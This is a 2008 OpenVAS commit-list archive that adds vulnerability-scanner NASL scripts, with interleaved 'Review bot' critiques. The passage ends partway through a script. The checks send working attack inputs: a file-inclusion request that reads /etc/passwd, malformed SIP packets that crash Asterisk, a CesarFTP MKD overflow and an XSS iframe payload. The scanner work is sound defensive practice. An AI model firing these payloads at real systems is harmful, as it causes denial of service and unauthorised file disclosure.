[Openvas-commits] r1210 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Fri Aug 22 16:09:15 CEST 2008
Author: jan
Date: 2008-08-22 16:09:14 +0200 (Fri, 22 Aug 2008)
New Revision: 1210
Added:
trunk/openvas-plugins/scripts/aardvark_422_remote_file_include.nasl
trunk/openvas-plugins/scripts/asterisk_null_pointer_dereference.nasl
trunk/openvas-plugins/scripts/asterisk_pbx_guest_access_enabled.nasl
trunk/openvas-plugins/scripts/asterisk_sdp_header_overflow.nasl
trunk/openvas-plugins/scripts/cesarftp_mkd_command_buffer_overflow.nasl
trunk/openvas-plugins/scripts/chipmunk_forum_xss.nasl
trunk/openvas-plugins/scripts/cisco_ios_ftp_server_auth_bypass.nasl
trunk/openvas-plugins/scripts/cisco_vpn_client_priv_escalation.nasl
trunk/openvas-plugins/scripts/docebo_globals_overwrite.nasl
trunk/openvas-plugins/scripts/eyeos_command_execution.nasl
trunk/openvas-plugins/scripts/freesshd_key_exchange_overflow.nasl
trunk/openvas-plugins/scripts/goaheadwebserver_source_disclosure.nasl
trunk/openvas-plugins/scripts/kiwi_cattools_dir_traversal.nasl
trunk/openvas-plugins/scripts/mercur_imap_buffer_overflow.nasl
trunk/openvas-plugins/scripts/phpMyAgenda_30final_file_include.nasl
trunk/openvas-plugins/scripts/php_fusion_6_00_206_sql_injection.nasl
trunk/openvas-plugins/scripts/qk_smtp_server_dos.nasl
trunk/openvas-plugins/scripts/sip.inc
trunk/openvas-plugins/scripts/xhp_cms_file_upload.nasl
trunk/openvas-plugins/scripts/zeroblog_xss.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
* scripts/phpMyAgenda_30final_file_include.nasl,
scripts/goaheadwebserver_source_disclosure.nasl,
scripts/chipmunk_forum_xss.nasl,
scripts/mercur_imap_buffer_overflow.nasl,
scripts/php_fusion_6_00_206_sql_injection.nasl,
scripts/sip.inc,
scripts/cisco_ios_ftp_server_auth_bypass.nasl,
scripts/docebo_globals_overwrite.nasl,
scripts/freesshd_key_exchange_overflow.nasl,
scripts/qk_smtp_server_dos.nasl,
scripts/asterisk_sdp_header_overflow.nasl,
scripts/eyeos_command_execution.nasl,
scripts/aardvark_422_remote_file_include.nasl,
scripts/xhp_cms_file_upload.nasl,
scripts/asterisk_pbx_guest_access_enabled.nasl,
scripts/cesarftp_mkd_command_buffer_overflow.nasl,
scripts/cisco_vpn_client_priv_escalation.nasl,
scripts/kiwi_cattools_dir_traversal.nasl,
scripts/zeroblog_xss.nasl,
scripts/asterisk_null_pointer_dereference.nasl:
New. All implemented by Ferdy Riphagen <f.riphagen at nsec.nl>.
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/ChangeLog 2008-08-22 14:09:14 UTC (rev 1210)
@@ -1,3 +1,27 @@
+2008-08-22 Jan-Oliver Wagner <jan-oliver.wagner at intevation.de>
+
+ * scripts/phpMyAgenda_30final_file_include.nasl,
+ scripts/goaheadwebserver_source_disclosure.nasl,
+ scripts/chipmunk_forum_xss.nasl,
+ scripts/mercur_imap_buffer_overflow.nasl,
+ scripts/php_fusion_6_00_206_sql_injection.nasl,
+ scripts/sip.inc,
+ scripts/cisco_ios_ftp_server_auth_bypass.nasl,
+ scripts/docebo_globals_overwrite.nasl,
+ scripts/freesshd_key_exchange_overflow.nasl,
+ scripts/qk_smtp_server_dos.nasl,
+ scripts/asterisk_sdp_header_overflow.nasl,
+ scripts/eyeos_command_execution.nasl,
+ scripts/aardvark_422_remote_file_include.nasl,
+ scripts/xhp_cms_file_upload.nasl,
+ scripts/asterisk_pbx_guest_access_enabled.nasl,
+ scripts/cesarftp_mkd_command_buffer_overflow.nasl,
+ scripts/cisco_vpn_client_priv_escalation.nasl,
+ scripts/kiwi_cattools_dir_traversal.nasl,
+ scripts/zeroblog_xss.nasl,
+ scripts/asterisk_null_pointer_dereference.nasl:
+ New. All implemented by Ferdy Riphagen <f.riphagen at nsec.nl>.
+
2008-08-22 Vlatko Kosturjak <kost at linux.hr>
* scripts/slad_ssh.inc: Fix to correctly report port for SSH login,
Added: trunk/openvas-plugins/scripts/aardvark_422_remote_file_include.nasl
===================================================================
--- trunk/openvas-plugins/scripts/aardvark_422_remote_file_include.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/aardvark_422_remote_file_include.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,96 @@
+#
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+# Original advisory / discovered by :
+# http://milw0rm.com/exploits/1732
+#
+
+if (description) {
+ script_id(200005);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-2149");
+ if (defined_func("script_xref")) {
+ script_xref(name:"OSVDB", value:"25158");
+ }
+
+ name["english"] = "Aardvark Topsites <= 4.2.2 Remote File Inclusion Vulnerability";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+The remote system contains a PHP application that is prone to
+remote file inclusions attacks.
+
+Description :
+
+Aardvark Topsites PHP is installed on the remote host. It is
+a open source Toplist management system written in PHP.
+
+The application does not sanitize user-supplied input to
+the 'CONFIG[PATH]' variable in some PHP files. This allows
+an attacker to include arbitrary files from remote systems, and
+execute them with privileges under which the webserver operates.
+
+The flaw is exploitable if PHP's 'register_globals' is set to on.
+
+See also :
+
+http://secunia.com/advisories/19911/
+http://www.aardvarktopsitesphp.com/forums/viewtopic.php?t=4301
+
+Solution :
+
+Disable PHP's 'register_globals' or upgrade to the latest release.
+
+Risk factor :
+
+Medium / CVSS Base Score : 6
+(AV:R/AC:H/Au:NR/C:P/A:P/I:P/B:N)";
+ script_description(english:desc["english"]);
+ summary["english"] = "Checks for a file include in Aardvark Topsites less or equal to 4.2.2";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_ATTACK);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+if (thorough_tests) dirs = make_list("/topsites", "/aardvarktopsites", cgi_dirs());
+else dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+ res = http_get_cache(item:string(dir, "/index.php"), port:port);
+ if(res == NULL) exit(0);
+
+ if (egrep(pattern:"Powered By <a href[^>]+>Aardvark Topsites PHP<", string:res)) {
+ uri = "FORM[url]=1&CONFIG[captcha]=1&CONFIG[path]=";
+ lfile = "/etc/passwd";
+
+ req = http_get(item:string(dir, "/sources/join.php?", uri, lfile, "%00"), port:port);
+ recv = http_keepalive_send_recv(data:req, port:port, bodyonly:TRUE);
+ display(recv);
+ if (recv == NULL) exit(0);
+
+ if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv) ||
+ egrep(pattern:"Warning.+main\(/etc/passwd\\0\/.+failed to open stream", string:recv)) {
+ security_warning(port);
+ exit(0);
+ }
+ }
+}
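Review bot: `display(recv);` two lines after the exploit request is a debugging leftover that writes the fetched `/etc/passwd` body to the scanner console on every probe and also runs before the NULL check; delete that line. The positive-match patterns only cover a Unix passwd file or a PHP warning naming `/etc/passwd`, so a vulnerable Windows host or one with `display_errors` off is reported as clean — worth a comment above the `egrep` pair, e.g. `# Only detects Unix targets (/etc/passwd) or hosts that echo PHP warnings.` The `exit(0)` on a NULL reply ends the whole directory loop rather than moving on; `continue` would be the less surprising choice if a single directory times out.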
Added: trunk/openvas-plugins/scripts/asterisk_null_pointer_dereference.nasl
===================================================================
--- trunk/openvas-plugins/scripts/asterisk_null_pointer_dereference.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/asterisk_null_pointer_dereference.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,147 @@
+#
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+# Note:
+# Because of many systems using safe_asterisk to watchdog
+# the asterisk running process, this check could be
+# false negative prone.
+#
+
+if (description) {
+ script_id(9999991);
+ script_version("$Revision: 1.0 $");
+
+ name["english"] = "Asterisk PBX NULL Pointer Dereference Overflow";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+The host contains an service that is prone to a remote buffer overflow.
+
+Description :
+
+The remote host appears to be runnning Asterisk PBX, an open-source
+telephone system.
+
+The application suffers from a null pointer dereference overflow in
+the SIP service. When sending an mailformed SIP packet with no URI and
+version in the request an attacker can trigger a Denial of Service and
+shutdown the application resulting in a loss of availability.
+
+See also :
+
+http://labs.musecurity.com/advisories/MU-200703-01.txt
+http://asterisk.org/node/48320
+http://asterisk.org/node/48319
+http://www.kb.cert.org/vuls/id/228032
+
+Solution :
+
+Upgrade to Asterisk PBX release 1.4.1 or 1.2.16.
+
+Risk factor :
+
+Medium / CVSS Base Score : 5
+(AV:R/AC:L/Au:NR/C:N/A:C/I:N/B:A)";
+ script_description(english:desc["english"]);
+ summary["english"] = "Detect a null pointer dereference overflow in Asterisk PBX";
+ script_summary(english:summary["english"]);
+ script_category(ACT_DENIAL);
+ script_family(english:"Denial of Service");
+ script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");
+
+ script_dependencies("sip_detection.nasl");
+ script_require_keys("Services/udp/sip");
+ exit(0);
+}
+
+function get_sip_banner(port) {
+ local_var soc, r, opt, banner;
+ global_var port;
+
+ if (islocalhost()) soc = open_sock_udp(port);
+ else soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ opt = string(
+ "OPTIONS sip:user@", get_host_name(), " SIP/2.0", "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: User <sip:user", get_host_name(), ":", port, ">\r\n",
+ "From: Nessus <sip:nessus@", this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " OPTIONS\r\n",
+ "Contact: Nessus <sip:nessus@", this_host(), ">\r\n",
+ "Max-Forwards: 10\r\n",
+ "Accept: application/sdp\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+ send(socket:soc, data:opt);
+ r = recv(socket:soc, length:1024);
+ if ("SIP/2.0" >< r && ("Server:" >< r)) {
+ banner = egrep(pattern:'^Server:', string:r);
+ banner = substr(banner, 8);
+ }
+
+ else if ("SIP/2.0" >< r && ("User-Agent" >< r)) {
+ banner = egrep(pattern:'^User-Agent', string:r);
+ banner = substr(banner, 12);
+ }
+
+ if (!isnull(banner)) return banner;
+ return NULL;
+}
+
+function sip_send_recv(port, data) {
+ local_var r, soc;
+ global_var port, data;
+
+ if (islocalhost()) soc = open_sock_udp(port);
+ else soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ send(socket:soc, data:data);
+ r = recv(socket:soc, length:1024);
+ if (!isnull(r)) return r;
+ return NULL;
+}
+
+port = get_kb_item("Services/udp/sip");
+if (!port) port = 5060;
+
+option = string(
+ "OPTIONS sip:user@", get_host_name(), " SIP/2.0", "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: User <sip:user@", get_host_name(), ":", port, ">\r\n",
+ "From: Nessus <sip:nessus@", this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " OPTIONS\r\n",
+ "Contact: Nessus <sip:nessus@", this_host(), ">\r\n",
+ "Max-Forwards: 10\r\n",
+ "Accept: application/sdp\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+bad_register = string(
+ "REGISTER\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: User <sip:user@", get_host_name(), ":", port, ">\r\n",
+ "From: Nessus <sip:nessus@", this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " OPTIONS\r\n",
+ "Contact: Nessus <sip:nessus@", this_host(), ">\r\n",
+ "Max-Forwards: 0\r\n",
+ "Accept: application/sdp\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+banner = get_sip_banner(port:port);
+if ("Asterisk PBX" >!< banner) exit(0);
+
+exp = sip_send_recv(port:port, data:bad_register);
+if (isnull(exp)) {
+ res = sip_send_recv(port:port, data:option);
+ display(res);
+ if (isnull(res)) {
+ security_hole(port);
+ exit(0);
+ }
+}
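Review bot: The `security_hole(port)` verdict rests on two UDP datagrams going unanswered (the malformed REGISTER, then a single OPTIONS), so one dropped packet or a rate-limited PBX is reported as crashed; retry the OPTIONS probe before reporting, e.g. `for (i = 0; i < 3 && isnull(res); i++) { sleep(1); res = sip_send_recv(port:port, data:option); }`. `display(res);` on the line before that check is debug output and should go. In `get_sip_banner` the To header is built as `sip:user` immediately followed by the hostname, without the `@` that the same header carries in `option`; it only affects the banner grab but looks like a typo. The header comment already warns that `safe_asterisk` restarts make this check false-negative prone; the retry above also gives a restarted daemon time to come back, so say so there.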
Added: trunk/openvas-plugins/scripts/asterisk_pbx_guest_access_enabled.nasl
===================================================================
--- trunk/openvas-plugins/scripts/asterisk_pbx_guest_access_enabled.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/asterisk_pbx_guest_access_enabled.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,95 @@
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+# Fix by George A. Theall when the system answers the call.
+#
+
+if (description) {
+ script_id(9999993);
+ script_version("$Revision: 1.1 $");
+
+ name["english"] = "Asterisk PBX SIP Service Guest Access Enabled";
+ desc["english"] = "
+Synopsis :
+
+Asterisk PBX SIP service guest access is enabled.
+
+Description :
+
+Asterisk an open-source PBX is installed on the remote system.
+The SIP service is accepting SIP peers to use the proxy server
+as guest users. Unauthenticated users can use the proxy
+without supplying the required 'more secure' authentication.
+
+Guest access is enabled by default if 'allowguest=no' is not set
+in 'sip.conf'. Guest peers use the context defined under the
+general section and the restrictions set in the Asterisk config
+files.
+
+See also :
+
+http://www.voip-info.org/wiki/index.php?page=Asterisk+sip+allowguest
+
+Solution :
+
+If guest access is not needed, disable it by setting 'allowguest=no'
+in the sip.conf file.
+
+Risk factor :
+
+Medium / CVSS Base Score : 3.5
+(AV:R/AC:L/Au:NR/C:P/A:N/I:N/B:C)";
+ script_description(english:desc["english"]);
+ script_name(english:name["english"]);
+ summary["english"] = "Detect if it is possible for guest access to the Asterisk PBX SIP service";
+ script_summary(english:summary["english"]);
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"General");
+ script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");
+
+ script_dependencies("sip_detection.nasl");
+ script_require_keys("Services/udp/sip");
+ exit(0);
+}
+
+function sip_send_recv(port, data) {
+ local_var r, soc;
+ global_var port, data;
+
+ soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ send(socket:soc, data:data);
+ r = recv(socket:soc, length:1024);
+ if (!isnull(r)) return r;
+ return NULL;
+}
+
+if (islocalhost()) exit(0);
+port = get_kb_item("Services/udp/sip");
+if (!port) port = 5060;
+
+banner = get_kb_item(strcat("sip/banner/", port));
+if ("Asterisk PBX" >!< banner) exit(0);
+
+rpeer = string("NotExistingPeer", rand() %900 +100, "@");
+lpeer = string("Nessus", rand() %900 +100, "@");
+
+invite = string(
+ "INVITE sip:", rpeer, get_host_name(), " SIP/2.0", "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: <sip:", rpeer, get_host_name(), ":", port, ">\r\n",
+ "From: <sip:", lpeer, this_host(), ":", sport, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " INVITE\r\n",
+ "Contact: <sip:", lpeer, this_host(), ">\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+res = sip_send_recv(port:port, data:invite);
+if (isnull(res)) exit(0);
+
+if ("SIP/2.0 404 Not Found" >< res ||
+ ("SIP/2.0 100 Trying" >< res)) {
+ set_kb_item(name:"sip/guest_access/" + port, value:"yes");
+ security_warning(port);
+}
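Review bot: `sport` in the From header of the INVITE is never assigned anywhere in the script, so the header goes out as `<sip:Nessus123@<scanner>:>` with an empty port, which a SIP stack may reject before the guest-access decision is ever made. Use `port` there as the To header on the line above does, or define `sport = 5060;` to match the `open_priv_sock_udp(sport:5060, ...)` call in `sip_send_recv`. A `100 Trying` reply means the PBX has started routing a call to a non-existent peer; sending a `CANCEL` with the same Call-ID after the verdict would avoid leaving a half-open transaction on a production system — untested here, so treat as a suggestion.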
Added: trunk/openvas-plugins/scripts/asterisk_sdp_header_overflow.nasl
===================================================================
--- trunk/openvas-plugins/scripts/asterisk_sdp_header_overflow.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/asterisk_sdp_header_overflow.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,172 @@
+#
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+# Note :
+# Because probably many systems running safe_asterisk
+# as a watchdog for the asterisk pid, this check could
+# be very false-negative prone. Additionaly an INVITE
+# message on secure systems need authentication, so this
+# only works on systems using 'allowguest=yes' in sip.conf
+# and for peers without authentication info with the use
+# of an edited 'logins.nasl' (not supplied).
+#
+
+if (description) {
+ script_id(9999992);
+ script_version("$Revision: 1.0 $");
+ script_bugtraq_id(23031);
+ script_cve_id("CVE-2007-1561");
+
+ name["english"] = "Asterisk PBX SDP Header Overflow Vulnerability";
+ desc["english"] = "
+Synopsis :
+
+The remote SIP server is affected by an overflow vulnerability.
+
+Description :
+
+A version of Asterisk PBX is running on the remote host. Asterisk is
+a complete open-source VoIP system.
+
+The application installed suffers from a remote overflow in the SIP service
+resulting in a denial of service. An attacker can send a malformed INVITE packet
+with two SDP headers, whitin the first header a existing IP address in the 'c=' variable
+and in the second SDP header a NOT existing IP address in 'c='.
+
+This results in a Segmentation fault in 'chan_sip.c' crashing the Asterisk PBX service.
+
+See also :
+
+http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/053052.html
+http://bugs.digium.com/view.php?id=9321
+
+Solution :
+
+Upgrade to Asterisk release 1.4.2/1.2.17 or newer.
+
+Risk factor : Medium
+
+Medium / CVSS Base Score : 5.0
+(AV:R/AC:L/Au:NR/C:N/A:C/I:N/B:A)";
+ script_description(english:desc["english"]);
+ script_name(english:name["english"]);
+ summary["english"] = "Trigger an SegFault in Atsterisk PBX by parsing a not existing IP in 'c='";
+ script_summary(english:summary["english"]);
+ script_category(ACT_DENIAL);
+ script_family(english:"Denial of Service");
+ script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");
+
+ script_dependencies("sip_detection.nasl", "logins.nasl");
+ script_require_keys("Services/udp/sip");
+ exit(0);
+}
+
+function get_sip_banner(port) {
+ local_var soc, r, opt, banner;
+ global_var port;
+
+ if (islocalhost()) soc = open_sock_udp(port);
+ else soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ opt = string(
+ "OPTIONS sip:", get_host_name(), " SIP/2.0", "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: <sip:", get_host_name(), ":", port, ">\r\n",
+ "From: <sip:", this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " OPTIONS\r\n",
+ "Contact: <sip:nessus@", this_host(), ">\r\n",
+ "Max-Forwards: 10\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+ send(socket:soc, data:opt);
+ r = recv(socket:soc, length:1024);
+ if ("SIP/2.0" >< r && ("Server:" >< r)) {
+ banner = egrep(pattern:'^Server:', string:r);
+ banner = substr(banner, 8);
+ }
+
+ else if ("SIP/2.0" >< r && ("User-Agent" >< r)) {
+ banner = egrep(pattern:'^User-Agent', string:r);
+ banner = substr(banner, 12);
+ }
+
+ if (!isnull(banner)) return banner;
+ return NULL;
+}
+
+function sip_send_recv(port, data) {
+ local_var r, soc;
+ global_var port, data;
+
+ if (islocalhost()) soc = open_sock_udp(port);
+ else soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ send(socket:soc, data:data);
+ r = recv(socket:soc, length:1024);
+ if (!isnull(r)) return r;
+ return NULL;
+}
+
+port = get_kb_item("Services/udp/sip");
+if (!port) port = 5060;
+
+# Authentication is not yet used.
+#if (!isnull(get_kb_item("sip/login"))) {
+# user = get_kb_item("sip/login") + "@";
+#}
+user = NULL;
+
+#if (!isnull(get_kb_item("sip/password"))) {
+# pass = get_kb_item("sip/password") + "@";
+#}
+pass = NULL;
+
+option = string(
+ "OPTIONS sip:", get_host_name(), " SIP/2.0", "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: <sip:", get_host_name(), ":", port, ">\r\n",
+ "From: <sip:", this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " OPTIONS\r\n",
+ "Contact: <sip:nessus@", this_host(), ">\r\n",
+ "Max-Forwards: 0\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+sdp_headers = string(
+ "v=0\r\n",
+ "o=somehost 12345 12345 IN IP4 ", get_host_name(), "\r\n",
+ "c=IN IP4 ", get_host_name(), "\r\n",
+ "m=audio 16384 RTP/AVP 8 0 18 101\r\n\r\n",
+ "v=1\r\n",
+ "o=somehost 12345 12345 IN IP4 ", get_host_name(), "\r\n",
+ "c=IN IP4 555.x.555.x.555\r\n",
+ "m=audio 16384 RTP/AVP 8 0 18 101");
+
+bad_invite = string(
+ "INVITE sip:", get_host_name(), "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: <sip:", get_host_name(), ":", port, ">\r\n",
+ "From: <sip:", user, this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " INVITE\r\n",
+ "Contact: <sip:", user, this_host(), ">\r\n",
+ "Max-Forwards: 0\r\n",
+ "Content-Type: application/sdp\r\n",
+ "Content-Length: ", strlen(sdp_headers), "\r\n\r\n",
+ sdp_headers);
+
+banner = get_sip_banner(port:port);
+if ("Asterisk PBX" >!< banner) exit(0);
+
+exp = sip_send_recv(port:port, data:bad_invite);
+if (isnull(exp)) {
+ res = sip_send_recv(port:port, data:option);
+ if (isnull(res)) {
+ security_warning(port);
+ exit(0);
+ }
+}
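Review bot: The request line of `bad_invite` is `INVITE sip:<host>` with no trailing ` SIP/2.0`, which is the same missing-version malformation that the sibling `asterisk_null_pointer_dereference.nasl` in this commit uses to crash unpatched Asterisk; a crash observed here therefore cannot be attributed to the SDP `c=` parsing flaw this script claims to test, and a host patched for one bug but not the other is misreported. Change the line to `"INVITE sip:", get_host_name(), " SIP/2.0\r\n",` so that only the SDP body is malformed. The verdict also rests on one unanswered OPTIONS datagram, so a short retry loop with `sleep(1)` before `security_warning` would cut UDP-loss false positives. The description block states `Risk factor : Medium` twice in a row; drop the first.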
Added: trunk/openvas-plugins/scripts/cesarftp_mkd_command_buffer_overflow.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cesarftp_mkd_command_buffer_overflow.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/cesarftp_mkd_command_buffer_overflow.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,120 @@
+#
+# Script Written By Ferdy Riphagen
+#
+# Script distributed under the GNU GPLv2 License.
+#
+# Original advisory:
+# http://www.securiteam.com/exploits/5AP0B2AIUY.html
+#
+
+if (description) {
+ script_id(200058);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-2961");
+ script_bugtraq_id(18586);
+ if (defined_func("script_xref")) {
+ script_xref(name:"OSVDB", value:"26364");
+ }
+
+ name["english"] = "CesarFTP MKD Command Buffer Overflow";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+The remote system is running CesarFTP server, which is
+vulnerable to a buffer overflow attack.
+
+Description :
+
+CesarFTP Server version <= 0.99g is prone to a buffer overflow
+attack when using some ftp command followed with a long string
+of arguments.
+
+The system could crash, and accepts/execute arbitrary commands
+after the initial overflow attack.
+
+Note that the service runs with LOCAL SYSTEM privileges on the
+remote host, which means that an attacker can possible gain complete
+control over the system.
+
+To use the flaw an attacker needs access to the requested FTP server,
+by using a valid account/password or if activated the anonymous account.
+
+See Also :
+
+http://secunia.com/advisories/20574/
+
+Solution :
+
+At time of writing there is no update available.
+Filter access to the FTP service, so that it can be used by trusted
+sources only.
+
+Risk factor :
+
+Medium / CVSS Base Score : 6
+(AV:R/AC:L/Au:R/C:C/A:C/I:C/B:N)";
+ script_description(english:desc["english"]);
+ summary["english"] = "Detect a buffer overflow in CesarFTP server via a long MKD string";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_DENIAL);
+ script_family(english:"Denial of Service");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("find_service.nes, ftp_anonymous.nasl");
+ script_require_ports("Services/ftp", 21);
+ exit(0);
+}
+
+include("ftp_func.inc");
+include("global_settings.inc");
+
+port = get_kb_item("Services/ftp");
+if (!port) port = 21;
+if (!get_port_state(port)) exit(0);
+
+soc = open_sock_tcp(port);
+if (soc) {
+
+ # Use the 'HELP' command for version info
+ ftp_send_cmd(socket:soc, cmd:"HELP");
+ banner = recv(socket:soc, length:1024);
+
+if (!banner || ("CesarFTP server" >!< banner)) exit(0);
+ user = get_kb_item("ftp/login");
+ pass = get_kb_item("ftp/password");
+
+ if (!user) {
+ if (get_kb_item("ftp/anonymous")) {
+ user = "anonymous";
+ pass = "anonymous at anonymous.xx";
+ }
+ else exit(0);
+ }
+
+ if (!ftp_authenticate(socket:soc, user:user, pass:pass)) exit(0);
+
+ # Note:
+ # The original advisory is made for the MKD command. But at least
+ # the APPE, DELE, RMD, LIST, CWD, RETR commands are also vulnerable
+ # to the same stack overflow.
+
+ ftpcmd = "MKD";
+ buff = string(ftpcmd, raw_string(0x20), crap(data:raw_string(0x0A), length:700), "\r\n");
+ send = send(socket:soc, data:buff);
+
+ recv = recv(socket:soc, length:1024);
+ close(soc);
+
+ soc = open_sock_tcp(port);
+ if (soc) {
+ line = ftp_recv_line(socket:soc, retry:2);
+ }
+ if (!soc || (!strlen(line))) {
+ security_warning(port);
+ }
+ if (soc) close(soc);
+}
+
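Review bot: `send = send(socket:soc, data:buff);` stores the return value in a variable named after the builtin, shadowing `send()` for the rest of the script while the value is never used; write it as a bare `send(socket:soc, data:buff);`. The anonymous password literal reads `anonymous at anonymous.xx`, which looks like the mailing-list archive rewriting `@` as ` at ` (as it did in the author address above) — confirm the committed file carries `anonymous@anonymous.xx`, since a string with spaces is not an address an FTP server will take as a password. The unindented `if (!banner || ...) exit(0);` sits inside the `if (soc)` block and exits without closing `soc`; indent it and add `close(soc);` before the `exit`. The reconnect that decides the verdict is attempted immediately after `close(soc)`, so a server that is merely slow to accept a new control connection is reported as crashed; a retry with a short delay before `security_warning` would help.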
Added: trunk/openvas-plugins/scripts/chipmunk_forum_xss.nasl
===================================================================
--- trunk/openvas-plugins/scripts/chipmunk_forum_xss.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/chipmunk_forum_xss.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,94 @@
+#
+# Script Written By Ferdy Riphagen
+# <f(dot)riphagen(at)nsec(dot)nl>
+#
+# This script is released under the GNU GPLv2
+#
+
+if (description) {
+script_id(200004);
+script_version("$Revision: 1.0 $");
+
+script_bugtraq_id(15149);
+
+name["english"] = "Chipmunk Forum <= 1.3 Cross-Site Scripting Vulnerability";
+
+script_name(english:name["english"]);
+
+desc["english"] = "
+Synopsis :
+
+The remote host contains a PHP script that is vulnerable to cross-site
+scripting attacks.
+
+Description :
+
+The remote host appears to be running Chipmunk Forum.
+
+A vulnerability was identified in Chipmunk Forum version 1.3 and prior, which may be exploited by
+remote attackers to execute script code by the user's browser.
+
+See also :
+
+http://www.frsirt.com/english/advisories/2005/2172
+
+Solution :
+
+Unknown at this time.
+
+Risk factor :
+
+Low";
+script_description(english:desc["english"]);
+
+summary["english"] = "Check if Chipmunk is vulnerable to cross-site scripting attacks.";
+script_summary(english:summary["english"]);
+
+script_category(ACT_GATHER_INFO);
+script_family(english:"CGI abuses : XSS");
+
+script_copyright(english:"This script is Copyright (C) 2005 Ferdy Riphagen");
+
+script_dependencie("http_version.nasl");
+script_require_ports("Services/www", 80);
+
+exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+include("url_func.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+if (get_kb_item("www/", port, "/generic_xss")) exit(0);
+
+xss = "'</a><IFRAME SRC=javascript:alert(%27XSS%20DETECTED%20BY%20NESSUS%27)></IFRAME>";
+exss = urlencode(str:xss);
+
+#if (thorough_tests) dirs = make_list("/board", "/forum", "/", cgi_dirs());
+#else dirs = make_list(cgi_dirs());
+
+dirs = make_list("/chipmunk");
+
+foreach dir (dirs)
+{
